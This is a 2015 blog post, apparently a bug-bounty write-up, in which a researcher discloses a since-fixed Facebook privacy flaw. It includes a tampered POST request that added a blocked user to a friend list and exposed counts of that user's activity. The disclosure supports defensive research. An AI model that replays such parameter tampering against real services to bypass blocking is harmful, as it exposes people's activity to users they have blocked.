Wednesday 29 April 2015

Privacy leakage vulnerability in facebook - PoC by Shailesh Suthar



Privacy Leakage : Counts of actions of a blocked user can be viewed.

Hello , I am Shailesh Suthar, an independent security researcher. I found a vulnerability using that i was able to view counts of recent updates of a blocked user. Also It was possible to view counts of updates regarding status, photos, games, comments-likes , music-videos and other activities separately!

PoC: 
When we create a new friend list , following POST request is generated :

POST /friends/edit/ajax/save_list/ HTTP/1.1
Host: www.facebook.com
...
 
fb_dtsg=AQHtqbvxxxxx&listname=NAME_OF_LIST&members[0]=PROFILE_ID_OF_USER&text_members[0]=NAME_OF_USER&__user=100002309650515&__a=1&__dyn=xxxxxEyl2lm9o-t2u5bHaEWCueyrhEK4xxxxxxxxxxxCqrZo8popyui9DBwIhEyfyUnwPUS2O4K5e8xxxxxxxxxxxx&__req=d3&ttstamp=2658172116113981185356757249&__rev=1711798


Then I modified two parameters as below :

            listname=Dummy
            members[0]=PROFILE_ID_OF_BLOCKED_USER

Received below response:


for (;;);{"__ar":1,"payload":null,"onload":["goURI(\"\\\/lists\\\/ID_OF__FRIEND_LIST\");"],"bootloadable":{},"ixData":{},"lid":"0"}

Blocked person was added into new friend list name “Dummy”.
And just blocked user was existed in this List.

Even adding a blocked person in a friend list is not a security vulnerability (Still allowed). So I checked page of Friend lists (https://www.facebook.com/bookmarks/lists)
  

A counting number was shown for friend list as pointed in below image!





I reported this to Facebook security team. And it got fixed!
Thanks to Facebook security team for fixing this one.


Report Timeline:
============
Dec 28, 2014 8:38pm   - Report Sent
Jan 3, 2015 3:01am      - Escalation by Facebook
Jan 15, 2015 2:08am    - Fix Deployed by Facebook

Mar 6, 2015 11:11pm   - Bounty Awarded of  $1000 USD by Facebook :)

6 comments :